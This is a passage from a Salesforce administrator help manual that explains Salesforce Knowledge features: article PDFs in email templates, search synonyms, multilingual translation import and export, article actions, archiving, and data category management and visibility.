3. For example, If you want to edit the SUPPORT: Case Response with Solution (SAMPLE) template to include articles instead

of solutions, complete these steps:

a. Click Edit next to the SUPPORT: Case Response with Solution (SAMPLE) template.
b. Change the Email Template Name to SUPPORT: Case Response with Article (SAMPLE).
c. Modify the Template Unique Name as needed.
d. Choose Case Fields from the Select Field Type drop-down menu.
e. Choose Articles as PDFs from the Select Field drop-down menu.
f. Copy the value from the Copy Merge Field Value field and paste it in the email body.
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4. Click Save.

On the case detail page in the Emails related list, users can now click Send an Email and choose the new template. Articles
associated with the case are automatically converted to PDF attachments, and the attachments can be previewed or deleted
if needed before the email is sent.

Note:  Both the article and the knowledge base must be in the same language. For example, if your knowledge base
language is English but you want a Japanese article converted into a PDF, change your knowledge base language to
Japanese (in Setup, click Customize > Knowledge > Settings > Edit) before converting the article.

Notes on Field Visibility in Article PDFs

Consider the following information when using email templates that include the Articles as PDFs function:

• The fields that appear in article PDFs are determined by your profile if the Use a profile to create
customer-ready article PDFs on cases checkbox (from Setup, click Customize > Knowledge > Settings) is
not selected. If you can see all fields in the original article, all fields also appear in the automatically generated PDF. If
field-level security restricts you from seeing a field on an article, that field and its data do not appear in the article's PDF.

• If the Use a profile to create customer-ready article PDFs on cases checkbox is selected and a profile
is chosen from the Profile menu (from Setup, click Customize > Knowledge > Settings), the chosen profile determines
which fields appear in automatically generated PDFs. For example, if you are sending article PDFs to customers, you might
choose the Customer Portal User profile to ensure that internal-only fields do not appear in article PDFs.

• Fields in the Properties section of an article, including First Published, Last Modified, Last Published, and
Summary, are not included in any PDF version regardless of setting or profile.

See Also:
Salesforce Knowledge Overview
Setting Up Salesforce Knowledge

Managing Salesforce Knowledge Synonyms

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Synonyms”To create, edit, and delete synonym groups:

Salesforce Knowledge synonyms are words or phrases that are treated as equivalent in article searches, letting you optimize
search results. When searching articles, users can enter search terms that don't match any terms in your articles, but are
synonymous with those terms.

For example, if you define a synonym group with these synonyms:

CRM, customer relationship management, Salesforce

then a search for customer relationship management matches articles containing customer relationship management,
as well as articles containing CRM or Salesforce.
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When building synonym groups, work with knowledge managers and other subject matter experts in your organization to
create relevant synonyms.

To view and manage synonyms, from Setup, click Customize > Search > Knowledge Synonyms.

• To create a synonym group:

1. Click New.
2. Enter at least two synonyms. A synonym can be any word or phrase.
3. Select at least one language. If the synonyms are specific to a single language, select only that language. For example,

if zum biespiel and zB applies to German users only, select only German. If the synonyms apply regardless of the language
your users are searching in, select several languages for one synonym group. For example, if the synonym group Business
Objects and BO applies to English, German, and Spanish users, select all of these languages.

4. Click Save.

You can add up to 300 synonym groups.

Note:  You can't use the following symbols in synonyms:

DescriptionSymbol

Asterisk*

Question mark?

Quotation mark"

Open parenthesis(

Closed parenthesis)

• To filter a long list of groups, click Show Filters, then in the Synonyms field, enter part or all of a synonym, and click
Apply Filters.

• To edit a synonym group, click Edit next to the synonym group, then update as needed.

• To delete a synonym group, click Del next to the synonym group.

How Salesforce Knowledge Synonyms Work in Searches

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge synonyms affect search behavior in the following ways:

Priority

If a search term is part of a synonym group, the search results list items that contain the search term, followed by items
that contain other terms in the synonym group.

For example, if this synonym group is defined:

fruit, oranges

Then a search for oranges matches a list of items containing oranges, followed by items containing fruit.
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Note:  In the Article Management tab, if you sort the list by clicking a column header, the sort order, not
priority, persists in the current and additional searches.

Wildcards

If a wildcard is used in a search, the wildcard expands the search term, but the search doesn't match any synonyms, even
if the search phrase contains a defined synonym.

For example, if these synonym groups are defined:

fruit, oranges, apples

cabbage, lettuce

Then a search for orang* lettuce matches items that contain orange and oranges, but doesn't match items that
contain fruit, apples, and cabbage.

Operators

If a search phrase contains an operator (and/or/and not), synonym matches are returned only if the entire search
phrase is a defined synonym.

For example, if these synonym groups are defined:

fruit, oranges and apples

vegetables, carrots

Then a search for oranges and apples returns matches for all items that contain the literal string oranges and apples
as well as items that contain the term fruit.

However, if the search phrase is fruit and vegetables, which is not a defined synonym, the search matches only
those items that contain both the terms, fruit and vegetables.

In this case, and functions as an operator and synonym matches are not returned in the search results. In terms of this
example, items that contain a synonym of either fruit or vegetables (items that contain the term carrots or the phrase
oranges and apples) are not returned.

Exact phrase matches

If a defined synonym is only a part of a longer exact phrase search, the search doesn't treat it as a synonym.

For example, if this synonym group is defined:

oranges apples, fruit

Then an exact phrase search for “raspberries oranges apples” doesn't match items that contain the word
fruit.

Stemming

A synonym is not stemmed in search results; rather, it is matched as an exact phrase. However, the search term is
stemmed.

For example, if this synonym group is defined:

quench, drink orange juice

Then a search for quench matches items that contain quench, quenched, quenching, and drink orange juice, but doesn't
match items that contain drinking orange juice.
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Ignored words

Words that are normally ignored in searches, such as the, to, and for, are matched if the word is part of a defined synonym.

For example, if this synonym group is defined:

peel the orange, cut the apple

Then a search for peel the orange matches items that contain the exact string peel the orange.

Overlapping synonyms

If a search term consists of overlapping synonyms from different groups, the search matches synonyms in all of the
overlapping synonym groups.

For example, if these synonym groups are defined:

• orange marmalade, citrus

• marmalade recipe, sugar

Then a search for orange marmalade recipe matches items that contain orange marmalade, citrus, marmalade
recipe, and sugar.

Subsets

If one synonym group includes a synonym that is a subset of a synonym in another group, a search for the subset term
doesn't match items that contain synonyms from the subset synonym group.

For example, if these synonym groups are defined:

• orange, apple

• orange marmalade, citrus

• marmalade, jam

Then a search for orange marmalade matches items that contain orange marmalade and citrus, but doesn't match
items that contain apple or jam.

Setting up a Multilingual Knowledge Base
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To set up multiple languages for Salesforce Knowledge:

To set up your knowledge base to support multiple languages:

1. If you will send articles to a vendor for translation, you must create a translation queue. For a description of the translation
process, see Supporting Multiple Languages in Your Knowledge Base on page 2232.
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2. In Setup, click Customize > Knowledge > Settings and click Edit.
3. Select Multiple Languages and add the languages you want to include in your knowledge base. You can only add

languages supported by Salesforce.

Note:  You can't remove a language once you've added it to your knowledge base.

4. Optionally, choose the following settings for each language:

DescriptionSetting

Only active languages appear in the New Article dialog and
the Submit for Translation dialog. Also, active/inactive status

Active

determines whether a published article is visible. For
example, if articles are published in Spanish to your partner
portal and then you make Spanish an inactive language, the
articles are no longer visible to partners.

This value appears in the Assign To field of the Submit
for Translation dialog. Choose a person or a queue: the

Default Assignee

individual responsible for translating articles into this
language, or the queue used for exporting articles to a
localization vendor.

Select the person who should be assigned to review or publish
translations imported in this language.

Default Reviewer

5. Click Save.

See Also:
Setting Up Salesforce Knowledge
Customizing Salesforce Knowledge Settings

Supporting Multiple Languages in Your Knowledge Base

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

Watch a Demo: Supporting Multiple Languages with Salesforce Knowledge (3:39 minutes)

With multiple languages for Salesforce Knowledge you can lower support costs by translating articles into the languages your
audience prefers. After an administrator selects your language settings, two translation methods are available: translating articles
in-house using the editing tool in the knowledge base, or sending articles to a localization vendor. Different languages can
use different methods. For example, you may want to export articles to a vendor for French translations, but assign articles to
a Salesforce Knowledge user for Spanish translations.
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Translating an article within the knowledge base usually follows these steps:

1. An author or reviewer submits an article for translation to another knowledge base user (the assignee).
2. The assignee translates the article using the article editor, then assigns the finished translation to a reviewer or publisher.
3. The reviewer publishes the article. Publishing an article automatically includes both the source article and its completed

translations. Note that a translated version of an article can be published before its source article, but it will only be visible
to readers when its source article is also published.

Translating an article using a vendor usually follows these steps:

1. An author or reviewer assigns an article to a queue for translation.
2. An administrator creates an export file from the queue and sends the file to the localization vendor.
3. After the vendor returns the translated articles, an administrator imports the translated articles into the knowledge base.

Imported articles can be published automatically or assigned to a reviewer.
4. If the translations weren't published automatically, the assignee reviews and publishes them.

Implementation Tips

• Before you add languages to your knowledge base, decide for each language whether you want to translate articles directly
in Salesforce or export articles to a translation vendor. Communicate your decision to the people involved in the translation
process (authors, reviewers, translation managers, publishers).

• When adding a language to your knowledge base, keep in mind that it can't be deleted; however, you can hide a language
by making it inactive. Deactivating a language means it no longer appears as a choice in the New Article dialog or the
Submit for Translation dialog. Also, if articles are already published in the language, those articles are no longer visible to
readers as soon as the language is deactivated.

• You can only add languages supported by Salesforce to your knowledge base.
• To enable the article export feature, you must create one or more queues; authors and reviewers will select the queue when

they submit an article for translation. Make sure they know which queue to choose for which language.
• You must place all the translation files (meaning, those exported from Salesforce and translated by your vendor) in a folder

whose name is the same as the language code. For example, put French articles in an fr folder. Zip up this folder to create
your import file.

Best Practices

• To hide translated articles for a specific language, deactivate the language by unchecking Active on the Settings page.
• To import translated articles successfully, verify that the file structure and their extensions match the file structure and

extensions of files exported from Salesforce Knowledge for translation. For example, if the target language is French, the
file structure begins as follows:

import.properties
-fr
--articletypearticlename_kav
---articlename.csv
---[Article collateral, html, images, etc.]

See Also:
Setting up a Multilingual Knowledge Base
Exporting Articles for Translation
Translating Articles within Salesforce Knowledge
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Importing Article Translations

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”

AND

“Manage Articles”

AND

“Manage Knowledge Article Import/Export”

AND

“Read,” “Create,” “Edit,” and “Delete” on the article type

To import articles:

“Read” on the article typeTo view articles:

“Manage Articles”

AND

“Read” and “Create” on the article type

To create articles:

Consider the following before importing translated articles into Salesforce:

• You can only import articles that have been exported from the same Salesforce organization. For example, you can't export
articles from your test or sandbox organization and import them into your production organization.

• You must place all the translation files (meaning, those exported from Salesforce and translated by your vendor) in a folder
whose name is the same as the language code. For example, put French articles in an fr folder. Zip up this folder to create
your import file.

• To import translated articles successfully, verify that the file structure and their extensions match the file structure and
extensions of files exported from Salesforce Knowledge for translation. For example, if the target language is French, the
file structure begins as follows:

import.properties
-fr
--articletypearticlename_kav
---articlename.csv
---[Article collateral, html, images, etc.]

To import translated articles:

1. From Setup, click Data Management > Import Article Translations.
2. Choose how Salesforce handles translations after they're imported.
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DescriptionOption

Add imported translations to a queue from which users can
review them.

Review imported translations on the Article
Management tab before publishing

Publish imported translations without reviews.Publish translations immediately on import

3. Select the language of the articles you're importing.
4. Optionally, if you chose to have articles reviewed before publishing, select to send the files to a user or a queue and then

select the name of the user or queue.
5. Click Browse, choose the translation .zip file to upload, and click Open.
6. Click Import Now.

If you have more translated articles to upload, repeat steps four through six.

7. Click Finish.

An email notification is sent to you when your import finishes. You can view the status of your import from Setup by
clicking Monitoring > Article Imports and Exports.

See Also:
Setting up a Multilingual Knowledge Base
Exporting Articles for Translation

Exporting Articles for Translation

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”

AND

“Manage Articles”

AND

“Manage Knowledge Article Import/Export”

To export articles:

“Read” on the article typeTo view articles:

“Read” and “Create” on the article typeTo create articles:

If your organization sends Salesforce Knowledge articles to a vendor for translation, articles are put into a translation queue.

2235

Setting up a Multilingual Knowledge BaseAdding a Knowledge Base



Note:  You can have up to 50 exports in 24 hours and a maximum of 15 pending exports (exports that have not entered
a final state such as Completed, Failed, or Cancelled).

To generate an export file containing the articles that have been submitted for translation:

1. From Setup, click Data Management > Export Articles for Translation.
2. Select the queue that contains the articles you're exporting.
3. Click either:

• All articles to export every article in the queue.
• Updated articles to only export articles that have been modified or added.

4. Click Continue.
5. Select the source and target language pairs you want to export. Salesforce creates a separate .zip file for every article type

in each language pair.

Important:  You must retain the .zip file structure for a successful import. For more information, see Importing
Article Translations on page 2234.

6. To have the files reviewed or published after being translated, select a user or a queue and then select the name of the user
or queue.

7. Select the file character encoding:

• ISO-8859-1 (General US & Westion European, ISO-LATIN-1)
• Unicode
• Unicode (UTF-8) default

• Japanese (Windows)
• Japanese (Shift_JIIS)
• Chinese National Standard (GB18030)
• Chinese Simplified (GB2312)
• Chinese Traditional (Big5)
• Korean
• Unicode (UTF-16, Big Endian)

8. Select the delimiter for the .csv files. The delimiter is the separator for columns when the file is converted to table form.
Your options are:

• Tab (This is the default.)
• Comma

9. Click Export Now.

You're notified by email when your export is complete. You can also check the status of your export by viewing the Article
Import and Export Queue under Setup at Monitoring > Article Imports and Exports.

For description of status states, see Viewing Salesforce Knowledge Import and Export Status on page 2287.
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10. Unzip the exported files, but retain the file structure for a successful import.

See Also:
Setting up a Multilingual Knowledge Base

Creating and Activating Knowledge Actions
Knowledge actions are templates that link a workflow action to an article type.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To enable Salesforce Knowledge Actions:

When knowledge actions are enabled, you can use them to link article types to specific workflow article actions, such as
publishing. For example, if you want to have each FAQ published as a new version each time it completes the approval process,
you can create a knowledge action that links the FAQ article type to the Publish as New action. Then, when you create
an approval process for FAQs, select the new Knowledge Action.

Note:  When you create the approval process, make sure to change the final approval action to Unlock the record
for editing to let users publish the article.

To maximize memory usage when publishing large groups of articles, Salesforce may delay publication and adds the articles
to the publication queue. This happens when the number of articles and translations multiplied by the number of rich text
areas is greater than 100. You can view the publishing queue to check the status of the articles on the Automated Process
Actions page.

1. From Setup, click Create > Workflow & Approvals > Knowledge Actions.
2. Click New Knowledge Action.
3. Select the article type for the action. The workflow rules and approval process that you associate with the action must

belong to the same article type.
4. Enter a unique name for the knowledge action.
5. Select the type of action you want to apply to the article type. For example, Publish as New publishes the article as a

new version.
6. Enter a description.
7. Click Save.

The Knowledge Action detail page appears showing you the rules and approval processes that use the knowledge action.
8. When you’re ready to use the knowledge action in an approval or workflow process, click Activate on the Knowledge

Action detail page.
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Assigning Article Actions to Public Groups

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Users”

AND

“Manage Salesforce Knowledge”

To create public groups and assign them to article actions:

Article actions allow users to manage the article publishing and translation processes. By default all article actions are assigned
to users with the “Manage Articles” user permission, and users can complete an action as long as they also have the correct
article type permissions (as described in the table below). You can set up more granular control of article actions by restricting
them to public groups.

This table summarizes the article type permissions that are required for each article action.

DeleteEditReadCreateArticle Action

Publish Articles

Archive Articles

Delete Articles

Edit Published and Archived Articles

Submit Articles for Translation

Publish Translation

Edit Translation

To assign article actions to public groups:

1. Create a public group for each set of users.

Note:  Although you can add any Salesforce user to a public group, only users with the “Manage Articles” user
permission and the appropriate object permissions can perform article actions.

2. From Setup, click Customize > Knowledge > Article Actions and decide which users need to perform which actions. For
example, you might decide that a group named Publishers needs to publish, archive, and delete articles and that a group
named Translators needs to submit articles for translation and publish and archive translated articles.

3. Assign the public groups to article actions:
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a. From Setup, select Customize > Knowledge > Article Actions and click Edit.
b. For the action you want to modify, select the appropriate radio button and choose a public group. If you don't modify

an article action, all users with the “Manage Articles” permission can perform that action.
c. Click OK and Save.

See Also:
Setting Up Salesforce Knowledge

Archiving Articles and Translations

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Articles”

AND

“Create,” “Read,” “Edit,” or “Delete” on the article type

To create, edit, or delete articles:

“Manage Articles”

AND

“Create,” “Read,” “Edit,” and “Delete” on the article type

To publish or archive articles:

“Manage Articles”

AND

“Create,” “Read,” and “Edit” on the article type

To submit articles for translation:

Permissions vary depending on the approval process settingsTo submit articles for approval:

Archiving removes published articles that are obsolete so they no longer display to agents and customers on your organization's
Salesforce Knowledge channels.

To archive articles:

1. On the Article Management tab, select Published Articles in the View area, select the articles to archive, then click
Archive.... Alternatively, click Archive... on the detail page of a published article.

2. Select Archive article(s) now or Schedule archive on to choose the date to archive the article.
3. Click OK.

Articles you're archiving now move directly to the Archived Articles view. Articles you scheduled for archiving at a later date
continue to display on the Published Articles view, now with the pending icon ( ) next to the article title. Hover over the
icon to see the archive date. On the archive date, the article automatically moves to the Archived Articles view.
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Note:

• Conflicts may occur when different users perform actions on the same articles simultaneously. Depending on who
performs the action first, the articles will not be available for subsequent users though the articles still display
momentarily in the articles list. Performing an action on these articles results in a conflict error message.

• If you edit a published article that is scheduled for archiving, you also cancel the archiving.

• If an article has a published translation with a draft version, on archive, the draft version is deleted. Published
translations are archived along with the article.

Tip:  To cancel a scheduled archive, click Cancel Archive on the article detail page.

Creating and Modifying Category Groups
Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Category groups can be used by Salesforce Knowledge (articles) or answers communities (questions). In both cases, category
groups are containers for individual data categories. For example, a Contracts category group might contain Fixed Price, Cost
Reimbursement, and Indefinite Delivery categories. For more information, see What are Data Categories? on page 2241

To create or edit a category group:

1. From Setup, click Customize > Data Categories.
2. To create a new category group, click Create New in the Category Groups section. By default, you can create a maximum

of five category groups and three active category groups. Contact salesforce.com to request additional category groups.

To edit an existing category group, hover your cursor over the category group name and then click the Edit Category

Group icon ( ).

3. Specify the Group Name. This name appears as the title of the category drop-down menu on the Article Management
and Articles tabs, and, if applicable, in the public knowledge base. The Group Name does not appear on the Answers tab.

4. Optionally, modify the Group Unique Name. This is a unique name used to identify the category group in the SOAP
API.

5. Optionally, enter a description of the category group.
6. Click Save. You receive an email after the save process completes.

You can now add categories to your category group. When you create a new category group, Salesforce automatically creates
a top-level category in the group named All. Optionally, double-click All to rename it.
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Activating Category Groups

When you add a new category group, it's deactivated by default and only displays on the administrative setup pages for Data
Categories, Roles, Permission Sets, and Profiles. Keep your category groups deactivated to set up your category hierarchy and
assign visibility. Until you manually activate a category group, it does not display in Salesforce Knowledge or your answers
community In addition to activating the category group, for answers communities you must assign the category group to a
zone before the categories are visible on the Answers tab.

To activate a category group so it is available to users, move the mouse pointer over the name of the category group and click

the Activate Category Group icon ( ).

See Also:
Managing Data Categories
Adding Data Categories to Category Groups
Deleting Data Categories
Managing Articles and Translations
About Category Group Visibility
Managing Data Categories
Adding Data Categories to Category Groups
Deleting and Undeleting Category Groups
Managing Articles and Translations
About Category Group Visibility

What are Data Categories?

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Data categories can be used by Salesforce Knowledge (articles and article translations) and Answers, and Chatter Answers to
help users classify and find articles or questions. Administrators can use data categories to control access to articles and questions.

Salesforce Knowledge supports a five-level hierarchy of data categories within each category group. You can classify articles
in the knowledge base according to multiple categories that make it easy for users to find the articles they need. For example,
to classify articles by sales regions and business units, create two category groups, Sales Regions and Business Units. The Sales
Regions category group could consist of a geographical hierarchy, such as All Sales Regions as the top level, North America,
Europe, and Asia at the second level, and so on.

In an answers zone, data categories help organize questions for easy browsing. Each answers zone supports one category group.
For example, if you're a computer manufacturer you might create a Products category group that has four sibling categories:
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Performance Laptops, Portable Laptops, Gaming Desktops, and Enterprise Desktops. On the Answers tab, zone members
can assign one of the four categories to each question and then browse these categories for answers to specific questions.

Benefits of Data Categories

Logical Classification of Articles
As a knowledge base administrator, you can organize your knowledge base articles into a logical hierarchy and tag articles
with the attributes that are significant to your business.

Easy Access to Questions
As an answers administrator, you can choose which data categories are visible on the Answers tab. Zone members can
tag a question with a category, which makes finding questions and answers easier for other members.

Control of Article and Question Visibility
As a knowledge base or answers community administrator, you can centrally control the visibility articles or questions
by mapping roles, permission sets, or profiles to categories in the category groups. When an article or question is
categorized, users with visibility can automatically see it.

Article Filtering
As a support agent, when articles are classified into logical categories, you can quickly and easily locate the article you
need by filtering your organization's knowledge base. To ensure you see all relevant articles, filtering by category has
expansive results that include a category's upward and downward relatives in the category hierarchy. For example, if your
category hierarchy for products has the levels All Products > Computers > Laptops > Gaming Laptops and you are
helping a customer with a laptop problem, filtering by Laptops returns articles classified with Laptops as well as articles
classified with Computers, All Products, or Gaming Laptops. Effectively, you are made aware of useful related articles
like a free shipping offer for all products or an upgrade offer for gaming laptops. (To prevent irrelevant results, category
filtering doesn't return nonlineal relatives like siblings and cousins. Articles about Desktops, a sibling of Laptops, would
not display.)

Article and Question Navigation
As an end user, you can navigate the categories on the Articles tab or Answers tab to find the information you need to
solve your problem.

Managing Category Groups for Articles and Questions
If your organization has Salesforce Knowledge and an answers community, you can create separate category groups or
use the same category group for articles and questions.

Overview of Data Categories in Articles

A category group is the container for a set of categories. In Salesforce Knowledge it corresponds to the name of the category
drop-down menus. For example, if you use the Data Categories page (in Setup, click Customize > Data Categories) to create
and activate a category group called Products, a Products menu displays on the Article Management tab, the article edit page,
the Articles tab in all channels, and the public knowledge base.

As an illustration, the figure below shows a knowledge base administrator's view of an article about laptop deals; using the
article edit page, the administrator has classified the article with Laptops in the Products category group, and USA in the
Geography category group.
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Figure 14: An Article About Laptop Deals on the Article Management Tab

The next figure now illustrates an agent finding that same article published on the Articles tab; the agent has selected Laptops
and USA respectively in the Products and Geography drop-down menus to retrieve an article that is classified with both
Laptops and USA.

Figure 15: An Article About Laptop Deals on the Articles Tab

When you add categories to a category group, you build a hierarchy that can contain up to five levels of depth and up to 100
categories total. Each category can have one parent, many siblings, and many children. A robust and well-organized category
hierarchy helps users find the articles that are relevant to them quickly and easily.

By default, all Salesforce Knowledge users have access to all categories; however, you can restrict category visibility by role,
permission set, or profile.

Overview of Data Categories in Answers Zones

An answers zone supports one category group, and members can assign one category to each question. Even though you can
create up to five hierarchy levels of categories in a category group, only the first level of categories is supported in your answers
community. Child categories below the first level are not displayed in the community, and community members can't assign
these child categories to questions. The categories within the group display on the Answers tab below the zone name.
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Figure 16: Answers tab displaying categories

By default, all zone members have access to all categories; however, you can specify category visibility.

Implementation Tips

Consider the following information when planning and implementing data categories for your organization:

• You can create up to three category groups with a maximum of five hierarchy levels in each group. Each category group
can contain a total of 100 categories.

• If you want to use data categories with Answers, after creating your category group you must assign it from Setup by
clicking Customize > Answers > Data Category Assignments. You can only assign one category group to an answers
community. Salesforce Knowledge supports multiple category groups.

• Even though you can create up to five hierarchy levels of categories in a category group, only the first level of categories is
supported in your answers community. Child categories below the first level are not displayed in the community, and
community members can't assign these child categories to questions. Salesforce Knowledge supports a hierarchy of data
categories.

• Category groups are hidden from users until they are activated. Do not activate a category group until you have finished
defining its categories and their access settings, including their visibility.

• When assigning categories to articles, you can choose up to eight categories in a category group.
• If an article has no categories, it displays only when you choose the No Filter option in the category drop-down menu.
• When searching for articles or article translations, selecting a category automatically includes the parent and children of

that category and any grandparents, up to and including the top level. Sibling categories are not included. For example, if
a category hierarchy has the levels All Products, Switches, Optical Networks, and Metro Core, selecting “Optical Networks”
from the category drop-down menu returns articles assigned to any of the four categories. However, if the Switches category
has a sibling category called Routers, selecting “Optical Networks” does not return articles classified within Routers.
Category visibility settings may limit the specific articles you can find.

• Once visibility settings have been chosen for the categories:

◊ Users who are not assigned visibility can only see uncategorized articles and questions unless default category visibility
has been set up.

◊ For role-based visibility, Customer Portal users and partner portal users inherit the category group visibility settings
assigned to their account managers by default. You can change the category group visibility settings for each portal
role.
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◊ If you only have access to one category in a category group, the category drop-down menu for that category group does
not display on the Articles tab.

• Deleting a category:

◊ Permanently removes it. It cannot be restored. It never appears in the Recycle Bin.
◊ Permanently deletes its child categories.
◊ As applicable, removes the category and its children from the Answers tab, the Article Management tab, the Articles

tab in all channels, and your company's public knowledge base.
◊ Removes associations between the category and articles or questions. You can reassign articles and questions to another

category.
◊ Removes its mapping to visibility. Users lose their visibility to articles and answers associated with the deleted category.

• Deleting a category group:

◊ Moves it to the Deleted Category Groups section, which is a recycle bin. You can view items in this section but not
edit them. It holds category groups for 15 days before they are permanently erased and cannot be recovered. During
the 15–day holding period, you can either restore a category group, or permanently erase it immediately.

◊ Deletes all categories within that group.
◊ Removes all associations between the group's categories and articles or questions.
◊ Removes all associations between the group's categories and visibility.
◊ As applicable, removes the category drop-down menu from the Articles tab in all channels, the Article Management

tab, and your company's public knowledge base.

• You can translate the labels of categories and category groups using the Translation Workbench.

Best Practices

Consider the following tips when using data categories:

• To quickly manage data categories, use keyboard shortcuts.
• After creating or updating categories, set up category group visibility rules.
• Save your changes frequently. The more actions you perform before clicking Save, the longer it takes to save.

See Also:
Managing Data Categories
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Managing Data Categories

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Administrators can create data categories for Salesforce Knowledge articles or questions in a zone to help users classify and
find articles or questions. Administrators can also use data categories to control access to articles and questions. For more
information, see What are Data Categories? on page 2241.

From Setup, click Customize > Data Categories to view the Data Categories page where you can:

• Create a category group. A category group is the container for a set of categories. In Salesforce Knowledge it appears as
the name of the category drop-down menu on the Article Management and Articles tabs. For example, if you create two
category groups called Geography and Products, the Article Management and Articles tabs will have two category menus
from which to pick specific categories: Geography and Products. In Chatter Answers zones, the category group drop-down
menu is available on the Q&A tab and in Chatter Answers sites and portals. If you have set up categories for your zone,
users can select a category for their question when they post a question to the zone.

• Add categories to a category group. After creating a category group, you can create a hierarchy of categories within that
group. These are the values that users select when assigning a category to an article or question and when searching for
articles or questions.

• Modify existing categories. You can change a category's name, update its other attributes, move it to another location in
the hierarchy, or reorder categories alphabetically.

• Delete a category group. You can delete, restore, or permanently erase a category group.

• Delete a category. You can permanently remove any category.

• Translate categories. You can translate your categories with the languages you want to support.

• Hover over a category group to view its properties and see whether it is used in Salesforce Knowledge or an answers
community.

Note:  By default, Salesforce Knowledge users and answers community members have access to all articles and questions
associated with any category. If you want to restrict access to articles and questions, you can modify visibility settings
for data categories.
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Deleting Data Categories

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Warning:  Deleting categories can result in long processing times, changes to the visibility of articles and questions,
changes to the categorization of articles and questions, and other significant consequences. Read this entire topic
carefully before deleting categories.

To delete a category:

1. From Setup, click Customize > Data Categories.
2. Click a category group name.
3. Click a category name. If necessary, click Expand All to display all categories in the category group.
4. Press DELETE, or choose Delete Category from the Actions drop-down list.
5. Click OK in the confirmation dialog box.
6. Choose how you want to reclassify articles associated with the deleted category or the deleted category's children:

• Assign the deleted category's parent category.
• Assign a different category. You can select any other category in this category group.

Note:  The category you select cannot be deleted itself before you save your work.

• Do not assign the articles a new category in this category group.

In all cases, the articles retain their categories from other category groups.
7. Click Save.

Deleting a category:

• Permanently removes it. It cannot be restored. It never appears in the Recycle Bin.

• Permanently deletes its child categories.

• As applicable, removes the category and its children from the Answers tab, the Article Management tab, the Articles tab
in all channels, and your company's public knowledge base.

• Removes associations between the category and articles or questions. You can reassign articles and questions to another
category.

• Removes its mapping to visibility. Users lose their visibility to articles and answers associated with the deleted category.
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Important:  Modify the category hierarchy when user activity is low. Because the save process involves potentially
large and complex recalculations, it may take a long time to complete. During processing, users may experience
performance issues when searching for articles or questions or using category drop-down lists.

See Also:
What are Data Categories?
Managing Data Categories
Adding Data Categories to Category Groups
Modifying and Positioning Data Categories
Keyboard Shortcuts For Data Categories

Modifying and Positioning Data Categories

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“View Data Categories”To view the Data Categories page:

“Manage Data Categories”To create, edit, or delete data categories:

Warning:  Modifying categories can result in long processing times, changes to the visibility of articles, changes to
the categorization of articles and questions, and other significant consequences. Read this entire topic carefully before
modifying categories.

To modify the data categories in a category group and their positions in the hierarchy:

1. From Setup, click Customize > Data Categories.
2. Click a category group name.
3. Optionally, click Expand All to display the full category hierarchy, or Collapse All to display only the top-level categories.
4. Double-click a category to edit its name or its unique API name.
5. Use drag-and-drop editing to reposition a category in the hierarchy. As you drag, a red icon indicates an invalid destination,

while a green icon indicates a valid destination:

• Drag a category on top of another category to reposition it as a child of the destination category. For example, drag
USA on top of North America to make USA one level below North America. After dragging, the category displays
below the other child categories at that level.

• Drag a category to a line that borders another category to reposition it as a sibling of that category. For example, to
position USA between Canada and Mexico, drag it to the line between Canada and Mexico.

6. Hover your cursor over a category name, then choose Order Child Categories Alphabetically from the
Actions drop-down list to reorder that category's children in alphabetical order. This only affects the first level children,
not grandchildren or deeper levels.
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7. As you modify the category hierarchy, click Undo to cancel your last actions. Similarly, click Redo to step forward through
your flow of performed actions.

8. Click Save. You will receive an email when the save process completes.

Note: Save your changes frequently. The more actions you perform before clicking Save, the longer it takes to
save.

The save process recalculates the following:

• The contents of the category drop-down menu.

• The articles and questions visible to each user.

• The articles and questions associated with categories.

Important:  Modify the category hierarchy when user activity is low. Because the save process involves potentially
large and complex recalculations, it may take a long time to complete. During processing, users may experience
performance issues when searching for articles or questions or using category drop-down lists.

Example: How Changing the Hierarchy Affects Article Visibility

Changing the category hierarchy potentially changes which articles users can see. In the example shown in the following
graphic, the category PDAs moves from the original parent category Computers to the new parent category Consumer
Electronics.

Note:  When a category moves to a new parent category, users that have no visibility on the new parent category lose
their visibility to the repositioned category.

Figure 17: Moving the category “PDAs”

To understand how this change affects which users can see articles classified with the PDAs category, see the following table.
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Why?Can I see PDA
articles in their
new location under
Consumer
Electronics?

Could I see
PDA articles in
their old
location under
Computers?

When my
role,
permission
set, or
profile is
mapped to:

When your role, permission set, or profile is mapped to the top-level
“All products” category, you can see everything in the category hierarchy.

YesYesAll products

You don't have access to the branch of the category hierarchy where
